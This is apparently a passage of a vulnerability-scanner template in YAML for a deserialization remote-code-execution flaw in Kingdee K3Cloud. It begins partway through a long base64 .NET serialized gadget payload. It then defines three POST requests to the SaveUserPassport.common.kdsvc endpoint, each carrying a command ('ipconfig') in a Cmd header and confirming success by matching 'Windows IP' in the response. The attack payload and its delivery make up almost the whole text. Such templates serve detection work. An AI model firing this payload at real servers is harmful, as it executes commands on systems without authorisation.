jVjM1JsYlM1R2RXNWpZREpiVzFONWMzUmxiUzVDZVhSbFcxMHNJRzF6WTI5eWJHbGlMQ0JXWlhKemFXOXVQVFF1TUM0d0xqQXNJRU4xYkhSMWNtVTlibVYxZEhKaGJDd2dVSFZpYkdsalMyVjVWRzlyWlc0OVlqYzNZVFZqTlRZeE9UTTBaVEE0T1Ywc1cxTjVjM1JsYlM1U1pXWnNaV04wYVc5dUxrRnpjMlZ0WW14NUxDQnRjMk52Y214cFlpd2dWbVZ5YzJsdmJqMDBMakF1TUM0d0xDQkRkV3gwZFhKbFBXNWxkWFJ5WVd3c0lGQjFZbXhwWTB0bGVWUnZhMlZ1UFdJM04yRTFZelUyTVRrek5HVXdPRGxkWFFrK0FBQUFDZ2srQUFBQUJsSUFBQUFhVTNsemRHVnRMbEpsWm14bFkzUnBiMjR1UVhOelpXMWliSGtHVXdBQUFBUk1iMkZrQ2dSREFBQUFMMU41YzNSbGJTNVNaV1pzWldOMGFXOXVMazFsYldKbGNrbHVabTlUWlhKcFlXeHBlbUYwYVc5dVNHOXNaR1Z5QndBQUFBUk9ZVzFsREVGemMyVnRZbXg1VG1GdFpRbERiR0Z6YzA1aGJXVUpVMmxuYm1GMGRYSmxDbE5wWjI1aGRIVnlaVElLVFdWdFltVnlWSGx3WlJCSFpXNWxjbWxqUVhKbmRXMWxiblJ6QVFFQkFRRUFBd2dOVTNsemRHVnRMbFI1Y0dWYlhRbFRBQUFBQ1Q0QUFBQUpVZ0FBQUFaV0FBQUFKMU41YzNSbGJTNVNaV1pzWldOMGFXOXVMa0Z6YzJWdFlteDVJRXh2WVdRb1FubDBaVnRkS1FaWEFBQUFMbE41YzNSbGJTNVNaV1pzWldOMGFXOXVMa0Z6YzJWdFlteDVJRXh2WVdRb1UzbHpkR1Z0TGtKNWRHVmJYU2tJQUFBQUNnRkVBQUFBUWdBQUFBWllBQUFBekFKVGVYTjBaVzB1Um5WdVkyQXlXMXRUZVhOMFpXMHVVbVZtYkdWamRHbHZiaTVCYzNObGJXSnNlU3dnYlhOamIzSnNhV0lzSUZabGNuTnBiMjQ5TkM0d0xqQXVNQ3dnUTNWc2RIVnlaVDF1WlhWMGNtRnNMQ0JRZFdKc2FXTkxaWGxVYjJ0bGJqMWlOemRoTldNMU5qRTVNelJsTURnNVhTeGJVM2x6ZEdWdExrTnZiR3hsWTNScGIyNXpMa2RsYm1WeWFXTXVTVVZ1ZFcxbGNtRmliR1ZnTVZ0YlUzbHpkR1Z0TGxSNWNHVXNJRzF6WTI5eWJHbGlMQ0JXWlhKemFXOXVQVFF1TUM0d0xqQXNJRU4xYkhSMWNtVTlibVYxZEhKaGJDd2dVSFZpYkdsalMyVjVWRzlyWlc0OVlqYzNZVFZqTlRZeE9UTTBaVEE0T1YxZExDQnRjMk52Y214cFlpd2dWbVZ5YzJsdmJqMDBMakF1TUM0d0xDQkRkV3gwZFhKbFBXNWxkWFJ5WVd3c0lGQjFZbXhwWTB0bGVWUnZhMlZ1UFdJM04yRTFZelUyTVRrek5HVXdPRGxkWFFrK0FBQUFDZ2srQUFBQUNWSUFBQUFHV3dBQUFBaEhaWFJVZVhCbGN3b0JSUUFBQUVNQUFBQUpXd0FBQUFrK0FBQUFDVklBQUFBR1hnQUFBQmhUZVhOMFpXMHVWSGx3WlZ0ZElFZGxkRlI1Y0dWektDa0dYd0FBQUJoVGVYTjBaVzB1Vkhsd1pWdGRJRWRsZEZSNWNHVnpLQ2tJQUFBQUNnRkdBQUFBUWdBQUFBWmdBQUFBdGdOVGVYTjBaVzB1Um5WdVkyQXlXMXRUZVhOMFpXMHVRMjlzYkdWamRHbHZibk11UjJWdVpYSnBZeTVKUlc1MWJXVnlZV0pzWldBeFcxdFRlWE4wWlcwdVZIbHdaU3dnYlhOamIzSnNhV0lzSUZabGNuTnBiMjQ5TkM0d0xqQXVNQ3dnUTNWc2RIVnlaVDF1WlhWMGNtRnNMQ0JRZFdKc2FXTkxaWGxVYjJ0bGJqMWlOemRoTldNMU5qRTVNelJsTURnNVhWMHNJRzF6WTI5eWJHbGlMQ0JXWlhKemFXOXVQVFF1TUM0d0xqQXNJRU4xYkhSMWNtVTlibVYxZEhKaGJDd2dVSFZpYkdsalMyVjVWRzlyWlc0OVlqYzNZVFZqTlRZeE9UTTBaVEE0T1Ywc1cxTjVjM1JsYlM1RGIyeHNaV04wYVc5dWN5NUhaVzVsY21sakxrbEZiblZ0WlhKaGRHOXlZREZiVzFONWMzUmxiUzVVZVhCbExDQnRjMk52Y214cFlpd2dWbVZ5YzJsdmJqMDBMakF1TUM0d0xDQkRkV3gwZFhKbFBXNWxkWFJ5WVd3c0lGQjFZbXhwWTB0bGVWUnZhMlZ1UFdJM04yRTFZelUyTVRrek5HVXdPRGxkWFN3Z2JYTmpiM0pzYVdJc0lGWmxjbk5wYjI0OU5DNHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajFpTnpkaE5XTTFOakU1TXpSbE1EZzVYVjBKUGdBQUFBb0pQZ0FBQUFaaUFBQUFoQUZUZVhOMFpXMHVRMjlzYkdWamRHbHZibk11UjJWdVpYSnBZeTVKUlc1MWJXVnlZV0pzWldBeFcxdFRlWE4wWlcwdVZIbHdaU3dnYlhOamIzSnNhV0lzSUZabGNuTnBiMjQ5TkM0d0xqQXVNQ3dnUTNWc2RIVnlaVDF1WlhWMGNtRnNMQ0JRZFdKc2FXTkxaWGxVYjJ0bGJqMWlOemRoTldNMU5qRTVNelJsTURnNVhWMEdZd0FBQUExSFpYUkZiblZ0WlhKaGRHOXlDZ0ZIQUFBQVF3QUFBQWxqQUFBQUNUNEFBQUFKWWdBQUFBWm1BQUFBUlZONWMzUmxiUzVEYjJ4c1pXTjBhVzl1Y3k1SFpXNWxjbWxqTGtsRmJuVnRaWEpoZEc5eVlERmJVM2x6ZEdWdExsUjVjR1ZkSUVkbGRFVnVkVzFsY21GMGIzSW9LUVpuQUFBQWxBRlRlWE4wWlcwdVEyOXNiR1ZqZEdsdmJuTXVSMlZ1WlhKcFl5NUpSVzUxYldWeVlYUnZjbUF4VzF0VGVYTjBaVzB1Vkhsd1pTd2diWE5qYjNKc2FXSXNJRlpsY25OcGIyNDlOQzR3TGpBdU1Dd2dRM1ZzZEhWeVpUMXVaWFYwY21Gc0xDQlFkV0pzYVdOTFpYbFViMnRsYmoxaU56ZGhOV00xTmpFNU16UmxNRGc1WFYwZ1IyVjBSVzUxYldWeVlYUnZjaWdwQ0FBQUFBb0JTQUFBQUVJQUFBQUdhQUFBQU1BQ1UzbHpkR1Z0TGtaMWJtTmdNbHRiVTNsemRHVnRMa052Ykd4bFkzUnBiMjV6TGtkbGJtVnlhV011U1VWdWRXMWxjbUYwYjNKZ01WdGJVM2x6ZEdWdExsUjVjR1VzSUcxelkyOXliR2xpTENCV1pYSnphVzl1UFRRdU1DNHdMakFzSUVOMWJIUjFjbVU5Ym1WMWRISmhiQ3dnVUhWaWJHbGpTMlY1Vkc5clpXNDlZamMzWVRWak5UWXhPVE0wWlRBNE9WMWRMQ0J0YzJOdmNteHBZaXdnVm1WeWMybHZiajAwTGpBdU1DNHdMQ0JEZFd4MGRYSmxQVzVsZFhSeVlXd3NJRkIxWW14cFkwdGxlVlJ2YTJWdVBXSTNOMkUxWXpVMk1Ua3pOR1V3T0RsZExGdFRlWE4wWlcwdVFtOXZiR1ZoYml3Z2JYTmpiM0pzYVdJc0lGWmxjbk5wYjI0OU5DNHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajFpTnpkaE5XTTFOakU1TXpSbE1EZzVYVjBKUGdBQUFBb0pQZ0FBQUFacUFBQUFIbE41YzNSbGJTNURiMnhzWldOMGFXOXVjeTVKUlc1MWJXVnlZWFJ2Y2dackFBQUFDRTF2ZG1WT1pYaDBDZ0ZKQUFBQVF3QUFBQWxyQUFBQUNUNEFBQUFKYWdBQUFBWnVBQUFBRWtKdmIyeGxZVzRnVFc5MlpVNWxlSFFvS1FadkFBQUFHVk41YzNSbGJTNUNiMjlzWldGdUlFMXZkbVZPWlhoMEtDa0lBQUFBQ2dGS0FBQUFRZ0FBQUFad0FBQUF2UUpUZVhOMFpXMHVSblZ1WTJBeVcxdFRlWE4wWlcwdVEyOXNiR1ZqZEdsdmJuTXVSMlZ1WlhKcFl5NUpSVzUxYldWeVlYUnZjbUF4VzF0VGVYTjBaVzB1Vkhsd1pTd2diWE5qYjNKc2FXSXNJRlpsY25OcGIyNDlOQzR3TGpBdU1Dd2dRM1ZzZEhWeVpUMXVaWFYwY21Gc0xDQlFkV0pzYVdOTFpYbFViMnRsYmoxaU56ZGhOV00xTmpFNU16UmxNRGc1WFYwc0lHMXpZMjl5YkdsaUxDQldaWEp6YVc5dVBUUXVNQzR3TGpBc0lFTjFiSFIxY21VOWJtVjFkSEpoYkN3Z1VIVmliR2xqUzJWNVZHOXJaVzQ5WWpjM1lUVmpOVFl4T1RNMFpUQTRPVjBzVzFONWMzUmxiUzVVZVhCbExDQnRjMk52Y214cFlpd2dWbVZ5YzJsdmJqMDBMakF1TUM0d0xDQkRkV3gwZFhKbFBXNWxkWFJ5WVd3c0lGQjFZbXhwWTB0bGVWUnZhMlZ1UFdJM04yRTFZelUyTVRrek5HVXdPRGxkWFFrK0FBQUFDZ2srQUFBQUJuSUFBQUNFQVZONWMzUmxiUzVEYjJ4c1pXTjBhVzl1Y3k1SFpXNWxjbWxqTGtsRmJuVnRaWEpoZEc5eVlERmJXMU41YzNSbGJTNVVlWEJsTENCdGMyTnZjbXhwWWl3Z1ZtVnljMmx2YmowMExqQXVNQzR3TENCRGRXeDBkWEpsUFc1bGRYUnlZV3dzSUZCMVlteHBZMHRsZVZSdmEyVnVQV0kzTjJFMVl6VTJNVGt6TkdVd09EbGRYUVp6QUFBQUMyZGxkRjlEZFhKeVpXNTBDZ0ZMQUFBQVF3QUFBQWx6QUFBQUNUNEFBQUFKY2dBQUFBWjJBQUFBR1ZONWMzUmxiUzVVZVhCbElHZGxkRjlEZFhKeVpXNTBLQ2tHZHdBQUFCbFRlWE4wWlcwdVZIbHdaU0JuWlhSZlEzVnljbVZ1ZENncENBQUFBQW9CVEFBQUFFSUFBQUFHZUFBQUFNWUJVM2x6ZEdWdExrWjFibU5nTWx0YlUzbHpkR1Z0TGxSNWNHVXNJRzF6WTI5eWJHbGlMQ0JXWlhKemFXOXVQVFF1TUM0d0xqQXNJRU4xYkhSMWNtVTlibVYxZEhKaGJDd2dVSFZpYkdsalMyVjVWRzlyWlc0OVlqYzNZVFZqTlRZeE9UTTBaVEE0T1Ywc1cxTjVjM1JsYlM1UFltcGxZM1FzSUcxelkyOXliR2xpTENCV1pYSnphVzl1UFRRdU1DNHdMakFzSUVOMWJIUjFjbVU5Ym1WMWRISmhiQ3dnVUhWaWJHbGpTMlY1Vkc5clpXNDlZamMzWVRWak5UWXhPVE0wWlRBNE9WMWRDVDRBQUFBS0NUNEFBQUFHZWdBQUFCQlRlWE4wWlcwdVFXTjBhWFpoZEc5eUJuc0FBQUFPUTNKbFlYUmxTVzV6ZEdGdVkyVUtBVTBBQUFCREFBQUFDWHNBQUFBSlBnQUFBQWw2QUFBQUJuNEFBQUFwVTNsemRHVnRMazlpYW1WamRDQkRjbVZoZEdWSmJuTjBZVzVqWlNoVGVYTjBaVzB1Vkhsd1pTa0dmd0FBQUNsVGVYTjBaVzB1VDJKcVpXTjBJRU55WldGMFpVbHVjM1JoYm1ObEtGTjVjM1JsYlM1VWVYQmxLUWdBQUFBS0FVNEFBQUFQQUFBQUJvQUFBQUFtVTNsemRHVnRMa052YlhCdmJtVnVkRTF2WkdWc0xrUmxjMmxuYmk1RGIyMXRZVzVrU1VRRUFBQUFDVG9BQUFBUVR3QUFBQUlBQUFBSmdnQUFBQWdJQUNBQUFBU0NBQUFBQzFONWMzUmxiUzVIZFdsa0N3QUFBQUpmWVFKZllnSmZZd0pmWkFKZlpRSmZaZ0pmWndKZmFBSmZhUUpmYWdKZmF3QUFBQUFBQUFBQUFBQUFDQWNIQWdJQ0FnSUNBZ0lURTlKMDdpclJFWXY3QUtESkR5YjNDdz09IiwiZm9ybWF0IjoiMyJ9")
  cmd: "ipconfig"
rules:
  r0:
    request:
      method: POST
      path: /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.User.UserService.SaveUserPassport.common.kdsvc
      headers:
        Content-Type: text/json
        Cmd: "{{cmd}}"
      body: "{{payloadBody}}"
    expression: response.status == 200 && response.body.bcontains(b'Windows IP')
  r1:
    request:
      method: POST
      path: /Kingdee.BOS.ServiceFacade.ServicesStub.User.UserService.SaveUserPassport.common.kdsvc
      headers:
        Content-Type: text/json
        Cmd: "{{cmd}}"
      body: "{{payloadBody}}"
    expression: response.status == 200 && response.body.bcontains(b'Windows IP')
  r2:
    request:
      method: POST
      path: /Kingdee.BOS.ServiceFacade.ServicesStub.User.UserService.SaveUserPassport.common.kdsvc?dcInfo=11
      headers:
        Content-Type: text/json
        Cmd: "{{cmd}}"
      body: "{{payloadBody}}"
    expression: response.status == 200 && response.body.bcontains(b'Windows IP')
expression: r0() || r1() || r2()

相关漏洞推荐